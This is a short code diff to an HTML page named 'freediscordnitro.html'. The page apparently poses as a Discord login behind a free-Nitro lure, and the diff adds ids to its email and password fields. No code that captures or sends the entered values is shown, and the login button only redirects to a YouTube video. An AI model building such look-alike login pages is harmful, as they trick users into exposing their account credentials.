--- a/freediscordnitro.html
+++ b/freediscordnitro.html
@@ -73,9 +73,9 @@
                 <form>
 			
                     <p>EMAIL OR PHONE NUMBER</p>
-                    <input>
+                    <input id="username" >
                     <p>PASSWORD</p>
-                    <input type="password">
+                    <input id="password"  type="password">
 <!--                     <a href="https://instagram.com/dastix">Forgat your password?</a> -->
 <!-- 		    <button onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'">Login</button> -->
 			<button id="btn" onclick="location.href='https://www.youtube.com/watch?v=BbeeuzU5Qc8'" type="button">LOGIN</button>
